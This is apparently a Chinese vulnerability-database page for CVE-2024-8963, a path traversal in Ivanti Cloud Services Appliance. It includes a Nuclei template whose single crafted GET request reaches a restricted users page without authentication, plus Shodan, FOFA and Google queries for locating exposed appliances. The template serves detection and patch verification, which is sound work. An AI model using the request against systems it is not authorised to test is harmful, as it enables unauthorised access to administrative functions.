CVE-2024-8963: Ivanti Cloud Services Appliance - Path Traversal

日期: 2025-08-01 | 影响软件: Ivanti Cloud Services Appliance | POC: 已公开

漏洞描述

Path Traversal in the Ivanti CSA before 4.6 Patch 519 allows a remote unauthenticated attacker to access restricted functionality.

PoC代码[已公开]

id: CVE-2024-8963

info:
  name: Ivanti Cloud Services Appliance - Path Traversal
  author: johnk3r
  severity: critical
  description: |
    Path Traversal in the Ivanti CSA before 4.6 Patch 519 allows a remote unauthenticated attacker to access restricted functionality.
  reference:
    - https://www.fortinet.com/blog/threat-research/burning-zero-days-suspected-nation-state-adversary-targets-ivanti-csa
    - https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963?language=en_US
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8963
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-8963
    cwe-id: CWE-22
    epss-score: 0.94372
    epss-percentile: 0.99962
    cpe: cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:4.6:-:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ivanti
    product: endpoint_manager_cloud_services_appliance
    shodan-query:
      - http.title:"cloud services appliance"
      - http.title:"landesk(r) cloud services appliance"
    fofa-query: title="landesk(r) cloud services appliance"
    google-query: intitle:"landesk(r) cloud services appliance"
  tags: cve,cve2024,ivanti,kev,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/client/index.php%3F.php/gsb/users.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Ivanti Cloud Services Appliance"
          - "User name"
          - "Set Password"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100901974359acc982059131cd9dd9106b4c4e2d4d4cca357179cabb442ca3d9da3022100f4243cef6946b273cda33cddd6f86be2dc34a5cca085981c1e1394f0bdd6cbc0:922c64590222798bb761d5b6d8e72950

相关漏洞推荐